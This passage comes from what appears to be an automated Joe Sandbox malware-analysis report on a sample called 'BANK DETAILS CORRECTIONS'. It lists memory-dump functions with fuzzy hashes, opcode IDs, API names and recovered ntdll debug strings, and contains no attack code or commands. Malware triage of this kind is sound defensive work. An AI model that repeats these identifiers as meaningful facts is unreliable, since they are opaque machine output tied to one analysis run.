                                                                                    • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                    • Instruction Fuzzy Hash: 8C01F4322006899BEB22D71EC809F59BF9CEF82B50F0844A9FE0CDF6A1D679C900C350
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f38137d10b4a93bcfa6165509f00e773eee74ba2cb0038deb3748c82913a3230
                                                                                    • Instruction ID: 070ff96570986c0185c841e02afe48045aa54be3cd3edff12e0e536fe9c105d3
                                                                                    • Opcode Fuzzy Hash: f38137d10b4a93bcfa6165509f00e773eee74ba2cb0038deb3748c82913a3230
                                                                                    • Instruction Fuzzy Hash: A09002316059001291447158488C5468049ABE0301B55C021E0464554CCA148A565361
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2d698daaf56cd4e7bec814ea0343a9ea42671d7efdc129a0dabe2d1f4009670a
                                                                                    • Instruction ID: 76a0adf76f41d587195e318b4065bfca8d15936f2bdc16a0268e6a1a5e8720c5
                                                                                    • Opcode Fuzzy Hash: 2d698daaf56cd4e7bec814ea0343a9ea42671d7efdc129a0dabe2d1f4009670a
                                                                                    • Instruction Fuzzy Hash: 1B9002616016004241447158480C406A049ABE1301395C125A0594560CC61889559369
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: acc637d34963430cebd14575f2e4f59768f7355a1dd9dde4678d824ec3b09bb1
                                                                                    • Instruction ID: e6fb3d4d86d4bccb9e192b3a631668a532b864570cf7786442d05cfeadce279c
                                                                                    • Opcode Fuzzy Hash: acc637d34963430cebd14575f2e4f59768f7355a1dd9dde4678d824ec3b09bb1
                                                                                    • Instruction Fuzzy Hash: 1490023120150802D1087158480C68640499BD0301F55C021A6064655ED66589917231
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f5c5100859af43574aa3f123535c5f5ee749b311a0d148b2f0398788bc6c0be6
                                                                                    • Instruction ID: f4c6b847304d6b83dba36ab150a3ebbf2c7bd6b72b215898f61c7e706a6e006a
                                                                                    • Opcode Fuzzy Hash: f5c5100859af43574aa3f123535c5f5ee749b311a0d148b2f0398788bc6c0be6
                                                                                    • Instruction Fuzzy Hash: D190023160550802D1547158441C74640499BD0301F55C021A0064654DC7558B5577A1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 15f379328513c7029fe1b2346d6038a4e03c94e8ba65720391fb6b0c89f367a0
                                                                                    • Instruction ID: e5082e4c21ed0b5ac6bdbd6da22fccfce199bb2d398081c66fa9420e131e8a92
                                                                                    • Opcode Fuzzy Hash: 15f379328513c7029fe1b2346d6038a4e03c94e8ba65720391fb6b0c89f367a0
                                                                                    • Instruction Fuzzy Hash: C090023120150802D1847158440C64A40499BD1301F95C025A0065654DCA158B5977A1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4a4400de2ebbb0072e63659e02272062b49532b53ea4e4ff81b1c288a7105bcc
                                                                                    • Instruction ID: 48abfcf06e384293e94804e5452f1925c3b85d63fb54250430a6a4b4cf725337
                                                                                    • Opcode Fuzzy Hash: 4a4400de2ebbb0072e63659e02272062b49532b53ea4e4ff81b1c288a7105bcc
                                                                                    • Instruction Fuzzy Hash: F190023120554842D1447158440CA4640599BD0305F55C021A00A4694DD6258E55B761
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b9daab9d6ba782ae5dbfbe503167ab1c565c561ac947cae6a8703b5b9ee762d4
                                                                                    • Instruction ID: 7de4f22ba3f9dcf31acf0a6f548b414a9d7e6edd1396f3e69a01560958cfb8ef
                                                                                    • Opcode Fuzzy Hash: b9daab9d6ba782ae5dbfbe503167ab1c565c561ac947cae6a8703b5b9ee762d4
                                                                                    • Instruction Fuzzy Hash: F59002A1201640924504B258840CB0A85499BE0201B55C026E1094560CC52589519235
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1a4e98ef9be17a23fd888ea333dd87ed60895932344b9feea4a6822fd484cd46
                                                                                    • Instruction ID: 2e74366b9c44751d1d6d0cfd8e3b527df7a2da38daceb65f8d084e22b9599dba
                                                                                    • Opcode Fuzzy Hash: 1a4e98ef9be17a23fd888ea333dd87ed60895932344b9feea4a6822fd484cd46
                                                                                    • Instruction Fuzzy Hash: FD90043531150003010DF55C070C50740CFDFD5351355C031F1055550CD731CD715331
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8a52f9d2c72722e3ad5284e9cd2732d3a318b72e93c22ce754b847a6536489fd
                                                                                    • Instruction ID: 246016e3d9df645862b28439ebbf99e8a906eca566e9c07a342d9635a76d21ee
                                                                                    • Opcode Fuzzy Hash: 8a52f9d2c72722e3ad5284e9cd2732d3a318b72e93c22ce754b847a6536489fd
                                                                                    • Instruction Fuzzy Hash: BF900225221500020149B558060C50B4489ABD6351395C025F1456590CC62189655321
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6cb6574275aa1c2b71caa68c098d7abc6b47b7b7a7fa305b34adaebe3a31d5ea
                                                                                    • Instruction ID: 8f964f42733a81c2f58b6237d15a3de22e2ee53d0c40934c3c2b2a98f02ebe31
                                                                                    • Opcode Fuzzy Hash: 6cb6574275aa1c2b71caa68c098d7abc6b47b7b7a7fa305b34adaebe3a31d5ea
                                                                                    • Instruction Fuzzy Hash: B090023124150402D1457158440C606404DABD0241F95C022A0464554EC6558B56AB61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 64cbbbd8047bdaae3356081d84c185589ac9466596386f6719ffeecda4be0c37
                                                                                    • Instruction ID: b3de83bdf661cca8c0613cb1e55caef9a9894fb228ca584fa5d3dff5419bdba7
                                                                                    • Opcode Fuzzy Hash: 64cbbbd8047bdaae3356081d84c185589ac9466596386f6719ffeecda4be0c37
                                                                                    • Instruction Fuzzy Hash: E2900221242541525549B158440C507804AABE0241795C022A1454950CC5269956D721
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: efe0862a06dfe77b79e1ef7f70aa9aba771a0962412f1d6a4011bb4cbe8bacb1
                                                                                    • Instruction ID: 3dea46950918ae88ac786db5aab1ae911f4a7a8d24cebb0cb7bd46cddd32ab42
                                                                                    • Opcode Fuzzy Hash: efe0862a06dfe77b79e1ef7f70aa9aba771a0962412f1d6a4011bb4cbe8bacb1
                                                                                    • Instruction Fuzzy Hash: 2690022921350002D1847158540C60A40499BD1202F95D425A0055558CC91589695321
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 046691a736696f2cfd66836e1b73e49d355d0a18c4e45dcd9f7ae0ea2008cef2
                                                                                    • Instruction ID: 9fc3f1d32dee5c9ba88400df302c9063158b395069f8b05418148eda814615fe
                                                                                    • Opcode Fuzzy Hash: 046691a736696f2cfd66836e1b73e49d355d0a18c4e45dcd9f7ae0ea2008cef2
                                                                                    • Instruction Fuzzy Hash: EE90022120554442D1047558540CA0640499BD0205F55D021A10A4595DC6358951A231
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0db6c6883719b160f831cfd99f957b3f877860bb26bd4497aa8eeac3328b4056
                                                                                    • Instruction ID: 635c2c1770f10acb136f364a36ebd76bfa604cfbc58604df639a29da102a554a
                                                                                    • Opcode Fuzzy Hash: 0db6c6883719b160f831cfd99f957b3f877860bb26bd4497aa8eeac3328b4056
                                                                                    • Instruction Fuzzy Hash: 3C90022130150003D1447158541C6068049EBE1301F55D021E0454554CD91589565322
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b9a263e105675ea5f04de27f99b60d542809377a5e904240564df4eeb8e5a921
                                                                                    • Instruction ID: 920a7e2d08b20bb35d9e2f8d217d4d5c075788427a5dbec324d86c80029fa766
                                                                                    • Opcode Fuzzy Hash: b9a263e105675ea5f04de27f99b60d542809377a5e904240564df4eeb8e5a921
                                                                                    • Instruction Fuzzy Hash: 6F90023120150402D1047598540C64640499BE0301F55D021A5064555EC66589916231
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5afc261609ba78487d093a765f3c10cb4bcb89973b1876b2f1ee003c26c6bbb6
                                                                                    • Instruction ID: 78a572ea9b9ba316a7abb236346c3fddc11bcaa07090d79a257dbd4b8e852cb0
                                                                                    • Opcode Fuzzy Hash: 5afc261609ba78487d093a765f3c10cb4bcb89973b1876b2f1ee003c26c6bbb6
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                    • API String ID: 48624451-2108815105
                                                                                    • Opcode ID: f2eb0563d481106e97a5b985ee4f2bb7b61009eead70dc55ee89e8fb1afb2c36
                                                                                    • Instruction ID: e74de5e02ab319e598a5788a4d1548cbb696e8bf48efe98f86ea3f4d5edf8fd2
                                                                                    • Opcode Fuzzy Hash: f2eb0563d481106e97a5b985ee4f2bb7b61009eead70dc55ee89e8fb1afb2c36
                                                                                    • Instruction Fuzzy Hash: 9D51D4B2A00116AFDB11DF9C899097EFBBCBB88241754C529E56DD7641D334DE40CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                    • API String ID: 48624451-2108815105
                                                                                    • Opcode ID: 91126317ac7baef9649076ab94eb5e28c8d9f89d181de17db363d6b70ff7b2f6
                                                                                    • Instruction ID: 55fe9a7eec25cf2ac3ec531cd9fb7564c1f7b67220f801fef3a92b6110276d5b
                                                                                    • Opcode Fuzzy Hash: 91126317ac7baef9649076ab94eb5e28c8d9f89d181de17db363d6b70ff7b2f6
                                                                                    • Instruction Fuzzy Hash: 82511571A00646AECB31DF9DC99097FBBFCEF84201B44C869E99ED7641E674EA408760
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01994655
                                                                                    • ExecuteOptions, xrefs: 019946A0
                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 01994787
                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01994725
                                                                                    • Execute=1, xrefs: 01994713
                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019946FC
                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01994742
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                    • API String ID: 0-484625025
                                                                                    • Opcode ID: 0fe686b166840e37684ec5515edf7d9e83eca5131b93a89d51be3ee1619ba7ba
                                                                                    • Instruction ID: 7d3637f4a1718326971b2f2acb72d19c406c757734a5aecceb98f861ae815324
                                                                                    • Opcode Fuzzy Hash: 0fe686b166840e37684ec5515edf7d9e83eca5131b93a89d51be3ee1619ba7ba
                                                                                    • Instruction Fuzzy Hash: 56513931A0121AAEEF15EBE8EC85FAD77ACAF54304F4400A9DA0DB7180D7719B45CF61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-$0$0
                                                                                    • API String ID: 1302938615-699404926
                                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                    • Instruction ID: ee19f4abbc2c29ff2ff48aeec0ec0b4f81085ba473c007ff7f49f2a9e0818db9
                                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                    • Instruction Fuzzy Hash: 0E81C230F0524A8EEF258E6CC8517FEBBBDAF45321F18451AD95BE7691E73488408B71
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: %%%u$[$]:%u
                                                                                    • API String ID: 48624451-2819853543
                                                                                    • Opcode ID: 4b5f49604b728e689ad5dd78c0e542f8617b866000be49502d6c09696e68c531
                                                                                    • Instruction ID: 90a4cefdcde9a22895b278d652eccd1ef3ed06bc6186afbe5f47ed3061ee2428
                                                                                    • Opcode Fuzzy Hash: 4b5f49604b728e689ad5dd78c0e542f8617b866000be49502d6c09696e68c531
                                                                                    • Instruction Fuzzy Hash: 0421357AE00119ABDB11DF79DC40AEEBBFCFF54654F484116E919E3204E730DA018BA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019902E7
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019902BD
                                                                                    • RTL: Re-Waiting, xrefs: 0199031E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                    • API String ID: 0-2474120054
                                                                                    • Opcode ID: 23e99cd629569d6367df7f72af44d44214c09aa1c9236ab5ab78aac83db85540
                                                                                    • Instruction ID: 252845fa34aa15af2b669445969e96c2c7c40e0750cf4c7973644951302cab28
                                                                                    • Opcode Fuzzy Hash: 23e99cd629569d6367df7f72af44d44214c09aa1c9236ab5ab78aac83db85540
                                                                                    • Instruction Fuzzy Hash: 02E1AD706047429FEB25CF2CC885F2ABBE8BF84314F180A59F5A98B2E1D774D945CB52
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01997B7F
                                                                                    • RTL: Resource at %p, xrefs: 01997B8E
                                                                                    • RTL: Re-Waiting, xrefs: 01997BAC
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 0-871070163
                                                                                    • Opcode ID: 7f6c07d9d7d7ebf707ae407d878af718f9454c5a980898f9b3b19d9aef39eeb9
                                                                                    • Instruction ID: 4830bfa47d5841ed5b04a5b5ecda2332662194aaaa677a578a12b6e3d007db5e
                                                                                    • Opcode Fuzzy Hash: 7f6c07d9d7d7ebf707ae407d878af718f9454c5a980898f9b3b19d9aef39eeb9
                                                                                    • Instruction Fuzzy Hash: 6C41C2317007029FDB25DE29D840B6AB7EAEF98711F100A1DEE5EA7680DB71E4058B91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0199728C
                                                                                    Strings
                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01997294
                                                                                    • RTL: Resource at %p, xrefs: 019972A3
                                                                                    • RTL: Re-Waiting, xrefs: 019972C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 885266447-605551621
                                                                                    • Opcode ID: 92580e12b59115f8cddc53472d9b2888d2599b895d39298fc630cfb1689195c0
                                                                                    • Instruction ID: 69fc7be00a60f2fc1720073e6e7d7d0d53e4b976a54f69c92d862ebdf710b2ee
                                                                                    • Opcode Fuzzy Hash: 92580e12b59115f8cddc53472d9b2888d2599b895d39298fc630cfb1689195c0
                                                                                    • Instruction Fuzzy Hash: D841F431710206ABDB25CE69CC41F6ABBA5FF94711F100619FD5DA7240DB21E816CBD1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: %%%u$]:%u
                                                                                    • API String ID: 48624451-3050659472
                                                                                    • Opcode ID: b8094a3e59f775e1bd1e9a8b6447ce3a519aefc32447f6541c3479f2443b6238
                                                                                    • Instruction ID: e7326a50f30fab4e9343e4f6e6650b9cf340a6c4700cda8d6cc20398ee204d11
                                                                                    • Opcode Fuzzy Hash: b8094a3e59f775e1bd1e9a8b6447ce3a519aefc32447f6541c3479f2443b6238
                                                                                    • Instruction Fuzzy Hash: 8B317376A002199FDB20DF29CC40BEEB7BCAB54611F444556E94DE3200EF309A448BA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-
                                                                                    • API String ID: 1302938615-2137968064
                                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                    • Instruction ID: a474a88b8179f966e793e43784aea763e9afef06f3dcf0605bda5081af11b29e
                                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                    • Instruction Fuzzy Hash: 8491D670E002069BEB29CFADC890ABEBBADEF44725F14491AE95DE72D0D73499408771
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $$@
                                                                                    • API String ID: 0-1194432280
                                                                                    • Opcode ID: 472c6fc72625a01aecb6c759ecbd1126589f2ee162b712212acdfa8d07656fd8
                                                                                    • Instruction ID: 85ee35552164863a98d0889c21608f8919eaa0759398bd95f96fd794c3c5e0c6
                                                                                    • Opcode Fuzzy Hash: 472c6fc72625a01aecb6c759ecbd1126589f2ee162b712212acdfa8d07656fd8
                                                                                    • Instruction Fuzzy Hash: A9811975D002799BDB31DB54CC44BEABAB8AF49714F1041EAEA1DB7240D7709E85CFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
